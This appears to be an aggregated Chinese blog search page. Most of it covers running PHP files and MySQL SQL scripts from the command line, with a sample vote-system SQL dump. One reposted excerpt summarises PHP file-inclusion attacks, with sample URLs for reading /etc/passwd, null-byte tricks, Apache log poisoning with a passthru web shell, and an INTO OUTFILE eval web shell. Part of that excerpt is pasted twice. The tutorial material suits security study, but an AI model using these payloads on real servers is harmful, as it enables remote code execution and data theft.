精华内容
下载资源
问答
  • php 命令执行某个文件

    千次阅读 2018-06-12 14:58:22
    php path 加载文件,当前路径定义: define('PHP_ROOT_NEW', str_replace("\\", '/', substr(dirname(__FILE__), 0,-4))); require_once ...则执行文件为: php index.php...

    php path

    加载文件,当前路径定义:

    define('PHP_ROOT_NEW', str_replace("\\", '/', substr(dirname(__FILE__), 0,-4)));
    require_once PHP_ROOT_NEW.'include/common.inc.php';

    如上文件为index.php

    则执行文件为: php index.php

    展开全文
  • sql脚本是包含一到多个sql命令的sql语句,我们可以将这些sql脚本放在一个文本文件中(我们称之为“sql脚本文件”),然后通过相关的命令执行这个sql脚本文件。基本步骤如下:1、创建包含sql命令的sql脚本文件文件中...

    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到教程。

    sql脚本是包含一到多个sql命令的sql语句,我们可以将这些sql脚本放在一个文本文件中(我们称之为“sql脚本文件”),然后通过相关的命令执行这个sql脚本文件。基本步骤如下:
    1、创建包含sql命令的sql脚本文件
    文件中包含一些列的sql语句,每条语句最后以;结尾,文件内容示例如下:
    --创建表,使用“--”进行注释
    create table 表名称
    (                   
      Guid Varchar(38) not null primary key,  
      Title Varchar(255),       
                  
    ) TYPE=InnoDB;

    --在表A中增加字段Status
    alter table A add Status TinyInt default '0';

    --在表A上创建索引
    create index XX_TaskId_1 on A(Id_);
    --在A表中添加一条记录
    Insert into A (Id,ParentId, Name) values(1,0,'名称');
    --添加、修改、删除数据后,有可能需要提交事务
    Commit;

    2、执行sql脚本文件
    方法一 
    使用cmd命令执行(windows下,unix或linux在的其控制台下)
    【Mysql的bin目录】\mysql –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】,示例:
    D:\mysql\bin\mysql –uroot –p123456 -Dtest<d:\test\ss.sql
    注意:
    A、如果在sql脚本文件中使用了use 数据库,则-D数据库选项可以忽略
    B、如果【Mysql的bin目录】中包含空格,则需要使用“”包含,如:“C:\Program Files\mysql\bin\mysql” –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】

    方法二 进入mysql的控制台后,使用source命令执行
    Mysql>source 【sql脚本文件的路径全名】 或 Mysql>\. 【sql脚本文件的路径全名】,示例:

    source d:\test\ss.sql 或者 \. d:\test\ss.sql

     

    展开全文
  • MySQL命令执行sql文件的两种方法

    万次阅读 2015-11-09 17:00:48
    摘要:和其他数据库一样,MySQL也提供了命令执行sql脚本文件,方便地进行数据库、表以及数据等各种操作。下面笔者讲解MySQL执行sql文件命令的两种方法,希望能给刚开始学习 MySQL 数据库的朋友们。 学习过 SQL...

    原文地址:http://www.lezhu99.com/2416.html

    • 摘要:和其他数据库一样,MySQL也提供了命令执行sql脚本文件,方便地进行数据库、表以及数据等各种操作。下面笔者讲解MySQL执行sql文件命令的两种方法,希望能给刚开始学习 MySQL 数据库的朋友们。

    学习过 SQLServer 或 Oracle 的朋友会知道,sql 脚本是包含一到多个 sql 命令的 sql 语句集合,我们可以将这些 sql 脚本放在一个文本文件中(我们称之为“sql 脚本文件”),然后通过相关的命令执行这个 sql 脚本文件。基本步骤如下:

    1、创建 sql 脚本文件,例如下面一段 sql 语句,把它们拷贝到记事本,然后保存为 sql 后缀文件。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    c -- phpMyAdmin SQL Dump  
    -- version 2.10.0.2  
    --   
    -- 主机: localhost  
    -- 生成日期: 2007 年 10 月 27 日 06:38  
    -- 服务器版本: 5.0.37  
    -- PHP 版本: 5.2.1  
           
    SET  SQL_MODE= "NO_AUTO_VALUE_ON_ZERO" ;  
           
    --   
    -- 数据库: `votesystem`  
    --   
    CREATE  DATABASE  `votesystem`  DEFAULT  CHARACTER  SET  latin1  COLLATE latin1_general_ci;  
    USE `votesystem`;  
           
    -- --------------------------------------------------------  
           
    --   
    -- 表的结构 `admin`  
    --   
           
    CREATE  TABLE  `admin` (  
       `username`  char (20)  NOT  NULL  default  '' ,  
       `passwd`  char (20)  NOT  NULL  default  '' ,  
       PRIMARY  KEY   (`username`)  
    ) ENGINE=MyISAM  DEFAULT  CHARSET=gb2312;  
           
    --   
    -- 导出表中的数据 `admin`  
    --   
           
    INSERT  INTO  `admin`  VALUES  ( 'admin' 'admin' );  
           
    -- --------------------------------------------------------  
           
    --   
    -- 表的结构 `voteitem`  
    --   
           
    CREATE  TABLE  `voteitem` (  
       `voteitem_id`  smallint (5) unsigned  NOT  NULL  auto_increment,  
       `vote_id`  smallint (5) unsigned  NOT  NULL  default  '0' ,  
       `vote_item`  varchar (100)  NOT  NULL  default  '' ,  
       `vote_count`  smallint (5) unsigned  NOT  NULL  default  '0' ,  
       PRIMARY  KEY   (`voteitem_id`)  
    ) ENGINE=MyISAM   DEFAULT  CHARSET=gb2312 AUTO_INCREMENT=34 ;  
           
    --   
    -- 导出表中的数据 `voteitem`  
    --   
           
    INSERT  INTO  `voteitem`  VALUES  (25, 6,  'perl' , 10);  
    INSERT  INTO  `voteitem`  VALUES  (24, 6,  'python' , 20);  
    INSERT  INTO  `voteitem`  VALUES  (23, 6,  'c++' , 20);  
    INSERT  INTO  `voteitem`  VALUES  (22, 6,  'c' , 15);  
    INSERT  INTO  `voteitem`  VALUES  (21, 6,  'php' , 25);  
    INSERT  INTO  `voteitem`  VALUES  (29, 6,  'shell' , 5);  
    INSERT  INTO  `voteitem`  VALUES  (28, 6,  'asm' , 5);  
    INSERT  INTO  `voteitem`  VALUES  (27, 6,  'java' , 3);  
    INSERT  INTO  `voteitem`  VALUES  (26, 6,  'c#' , 4);  
    INSERT  INTO  `voteitem`  VALUES  (33, 7,  'Mac OS' , 60);  
    INSERT  INTO  `voteitem`  VALUES  (32, 7,  'OS/2' , 5);  
    INSERT  INTO  `voteitem`  VALUES  (31, 7,  'Windows' , 50);  
    INSERT  INTO  `voteitem`  VALUES  (30, 7,  'Linux' , 51);  
           
    -- --------------------------------------------------------  
           
    --   
    -- 表的结构 `votemain`  
    --   
           
    CREATE  TABLE  `votemain` (  
       `vote_id`  smallint (5) unsigned  NOT  NULL  auto_increment,  
       `vote_name`  varchar (100)  NOT  NULL  default  '' ,  
       `vote_time` datetime  NOT  NULL  default  '0000-00-00 00:00:00' ,  
       PRIMARY  KEY   (`vote_id`)  
    ) ENGINE=MyISAM   DEFAULT  CHARSET=gb2312 AUTO_INCREMENT=8 ;  
           
    --   
    -- 导出表中的数据 `votemain`  
    --   
           
    INSERT  INTO  `votemain`  VALUES  (7,  '你最喜欢的系统' '2007-10-26 14:10:13' );  
    INSERT  INTO  `votemain`  VALUES  (6,  '你最喜欢的语言' '2007-10-26 14:09:15' );

    2、使用命令执行 sql 脚本文件

    方法一,在 Windows 下使用 cmd 命令执行(或 Unix 或 Linux 控制台下)
    【Mysql的bin目录】\mysql –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】,示例:
    C:\MySQL\bin\mysql –uroot –p123456 -Dtest<C:\test.sql


    注意:
    A、如果在 sql 脚本文件中使用了 use 数据库,则 -D数据库 选项可以忽略
    B、如果【Mysql的bin目录】中包含空格,则需要使用“”包含,如:“C:\Program Files\MySQL\bin\mysql” –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】
    C、如果 sql 没有创建数据库的语句,而且数据库管理中也没有该数据库,那么必须先用命令创建一个空的数据库。

    方法二,进入 MySQL 控制台(如:MySQL 5.5 Command Line Client),使用 source 命令执行
    Mysql>source 【sql脚本文件的路径全名】 或 Mysql>\. 【sql脚本文件的路径全名】,示例:
    source C:\test.sql 或者 \. C:\test.sql
    打开 MySQL Command Line Client,输入数据库密码进行登录,然后使用 source 命令或者 \.

    或者

    展开全文
  • PHP文件包含与命令执行方式总结

    千次阅读 2016-11-25 18:10:24
    转自:...1、文件包含利用 通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell. Type of call: require($file); Exploit: http://host/?fi

    转自:http://www.myhack58.com/Article/html/3/7/2012/36277.htm

    1、文件包含利用

    通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.

    Type of call:
    require($file);

    Exploit:
    http://host/?file=/etc/passwd

    Type of call:
    require("includes/".$file);

    Exploit:
    http://host/?file=../../../../../etc/passwd

    Type of call:
    require("languages/".$lang.".php");
    require("themes/".$theme."/config.php");

    Exploit:
    http://host/?file=../../../../../etc/passwd%00

    Type of call:
    require("languages/".$_COOKIE['lang'].".php");

    Exploit:
    javascript:document.cookie = "lan=../../../../../etc/passwd%00″;

    2、包含命令执行
    当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。

    利用方式1:将内容插入apache日志里面。

    请求不存在的页面:http://host/xxxxxxx=<? passthru($_GET[cmd]) ?>
    然后按照前面的方式请求:
    http://host/?file=../../../var/apache/error_log&cmd=ls /etc
    http://host/?file=../../../var/apache/error_log&cmd=uname -a
    如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
    另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
    pepelux:~$ perl proc.pl http://host/index.php page GET
    Apache PID: 4191
    FD_SIZE: 64
    FD: 2
    得到PID 和 FD_ID后就可以这么构造。
    http://host/?file=/proc/4191/fd/2&cmd=uname -a

    http://host/index.php?x=<? passthru($_GET[cmd]) ?>

    1、文件包含利用
    通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.

    Type of call:
    require($file);

    Exploit:
    http://host/?file=/etc/passwd

    Type of call:
    require("includes/".$file);

    Exploit:
    http://host/?file=../../../../../etc/passwd

    Type of call:
    require("languages/".$lang.".php");
    require("themes/".$theme."/config.php");

    Exploit:
    http://host/?file=../../../../../etc/passwd%00

    Type of call:
    require("languages/".$_COOKIE['lang'].".php");

    Exploit:
    javascript:document.cookie = "lan=../../../../../etc/passwd%00″;

    2、包含命令执行
    当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。

    利用方式1:将内容插入apache日志里面。

    请求不存在的页面:http://host/xxxxxxx=<? passthru($_GET[cmd]) ?>
    然后按照前面的方式请求:
    http://host/?file=../../../var/apache/error_log&cmd=ls /etc
    http://host/?file=../../../var/apache/error_log&cmd=uname -a
    如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
    另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
    pepelux:~$ perl proc.pl http://host/index.php page GET
    Apache PID: 4191
    FD_SIZE: 64
    FD: 2
    得到PID 和 FD_ID后就可以这么构造。
    http://host/?file=/proc/4191/fd/2&cmd=uname -a
    http://host/index.php?x=<? passthru($_GET[cmd]) ?>


    http://host/?file=../../../tmp/sql.txt&cmd=uname -a


    补充说明:
    1) php5.3.4以后已经修复了%00漏洞。
    2) 前段时间select * from kj_tab limit 1 INTO OUTFILE “d:/kj.txt” LINES TERMINATED BY “<?php eval($living)?>”
    3) 参考文件中有几个perl写的小工具帮助利用。
    4) LFI配合phpinfo获取shell,参见LFI With PHPInfo Assistance.pdf
    5) 关于包含命令执行中方式2中80sec也有类似的文章。


    参考文件:
    Web vulnerabilities to gain access to the system http://www.enye-sec.org/en/papers/web_vuln-en.txt
    links:
    http://www.ourren.com/file-contains-the-summary-into-the-use-of.html
    http://www.waitalone.cn/post/1036.html


    展开全文
  • 配置终端启动时自动执行一些命令, 一般是source命令, 可以在 ~/.bashrc, ~/.bash_profile, ~/.profile, 或者 ~/.zshrc 文件添加这些命令, 然后重新启动终端。 关于~/.zshrc 当 Zsh 启动时,它会按照顺序...
  • 命令执行和代码执行

    千次阅读 2021-03-26 21:20:00
    命令执行 简介 命令执行通常因为指web应用在服务器上拼接系统命令而造成的漏洞。 命令执行直接调用操作系统命令。在操作系统中,“&、|、I"都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端...
  • 使用ld链接目标文件生成可执行文件,用于取代命令g++,仅仅用于学习ld命令的使用,不用于实际的项目编译。 首先看一个简单的C++源文件main.cpp。 // //@file:main.cpp // #include &amp;amp;amp;lt;...
  • sh文件介绍 .sh为Linux的脚本文件,我们可以通过.sh执行一些命令,可以理解为windows的.bat批处理文件。 点命令 ....sh、source和.命令执行.sh文件的区别 假如有一个文件test.sh,脚本内容如下 ...
  • ctf.show萌新模块 web11关, 这一关考察的是命令执行漏洞的利用, 源码中过滤了一部分命令执行函数和文件查看的命令, 推荐使用 passthru()函数配合 more命令获取敏感文件中的flag 页面中展示了一部分源码, 并...
  • MySQL执行外部sql脚本文件命令

    万次阅读 2017-04-10 22:06:08
    sql脚本是包含一到多个sql命令的sql语句,我们可以将这些sql脚本放在一个文本文件中(我们称之为“sql脚本文件”),然后通过相关的命令执行这个sql脚本文件。 1.创建包含sql命令的sql脚本文件 在...
  • ctf.show萌新模块 web9关,这一关考察的是命令执行漏洞的利用方式,使用PHP命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag 页面中展示了部分源码,很明显是作者提示我们利用命令执行漏洞...
  • 命令执行漏洞及防御

    千次阅读 2018-10-22 20:20:35
    命令执行PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。 原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。 条件:用户能够控制函数输入,存在可以执行代码的...
  • grep 命令执行后 显示匹配到二进制文件,说明grep 的字符串 在一个不开源的二进制文件源码中有用到,如果要看到里面再具体的字符,就用grep -a 命令,不过意义也不大,只要grep 命令执行后 显示匹配到二进制文件说明...
  • 相关的CMD命令 打开文件夹||进入指定文件夹 cd C:\Program Files\ 查看node.js版本 node -v 运行.js文件 node C:\phpStudy\...利用bat文件执行cmd命令运行node.js并执行.js文件 @echo off start cmd /...
  • 命令执行和代码执行漏洞

    千次阅读 2018-12-06 22:19:15
    代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行...
  • Web安全-命令执行漏洞

    千次阅读 2019-02-03 23:37:02
    PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法...
  • 命令执行基础知识

    千次阅读 2018-10-06 19:30:58
    就会用到一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen、popc_popen等,当用户调用这些函数时,将恶意系统命令注入到正常命令中,造成命令执行漏洞; PHP可动态执行PHP代码的有...
  • OS命令执行漏洞

    千次阅读 2017-08-16 21:29:34
    代码执行漏洞指的是可以执行PHP脚本代码,而命令执行漏洞指的是可以执行系统命令或应用指令(如cmd命令或bash命令)的漏洞 php命令执行漏洞主要是一些函数的参数过滤不严格所导致,可以执行OS命令的函数一共有7个:...
  • 常用的PHP命令执行函数及利用方式

    千次阅读 2021-09-11 18:28:10
    PHP命令执行函数常配合代码执行漏洞使用, 利用命令执行函数执行操作系统命令, 从而发起攻击, 接下来就简单分享几个常用的PHP命令执行函数 system(); system()函数可以执行系统命令, 并将命令执行的结果直接...
  • MYSQL 手动执行sql脚本文件命令

    千次阅读 2016-08-10 16:24:35
    通过相关的命令执行这个sql脚本文件,使得数据库数据导入到mysql数据库中。
  • php 命令执行系列

    千次阅读 2015-08-11 10:18:32
    本文描述了常见的PHP命令注入攻击漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入攻击漏洞给出了可行的方法和建议。 PHP命令注入攻击漏洞是PHP应用程序中常见的脚本
  • Linux 执行命令结果输出到文件

    万次阅读 2019-03-05 09:36:46
    文件 2.追加写入: echo "日志内容" &gt;&gt; 文件 3.linux shell中"2&gt;&amp;1"含义 对于&amp; 1 更准确的说应该是文件描述符 1,而1标识标准输出,stdout。 对于2 ,...
  • PHP执行系统命令函数

    万次阅读 2019-03-24 18:38:12
    命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。 常见的执行系统命令的函数有 system() passthru() exec() ...
  • 远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615...
  • Linux文件操作高频使用命令

    万次阅读 多人点赞 2019-08-28 16:47:38
    文章目录0.新建操作:1.查看操作2.删除操作3.复制操作4.移动操作:5.重命名操作:6.... 0.新建操作: ...mkdir abc #新建一个文件夹 ...cat|head|tail命令 cat abc.txt #查看abc的内容 head -5 abc.txt #...
  • bat文件执行oracle命令

    千次阅读 2010-07-10 14:33:00
    最近公司项目需要,需要java执行bat文件,查了下资料,也算简单:public class Test{ public static void main(String[] args) throws InterruptedException { try { Process child = Runtime.getRuntime().exec...
  • Web安全之命令执行漏洞

    千次阅读 2019-07-09 20:14:44
    命令执行漏洞的概述 命令执行漏洞的危害 命令执行漏洞的利用 命令执行漏洞的防御 背景介绍 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢...
  • 在终端中,脚本创建一个打开和执行命令的desktop文件 0 分享 0 赞 0 评论       问题: 要想打开一个新终端并在其中执行 shell script,我想知道如何编写。desktop文件的Exec 命令。 shell script ...
  • 通常,make 会把其要执行的命令行在命令执行前输出到屏幕上。当我们用“@”字符在命令行前,那么,这个 命令将不被 make 显示出来,最具代表性的例子是,我们用这个功能来像屏幕显示一些信息。 以make clean为例 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,199,452
精华内容 479,780
关键字:

命令执行php文件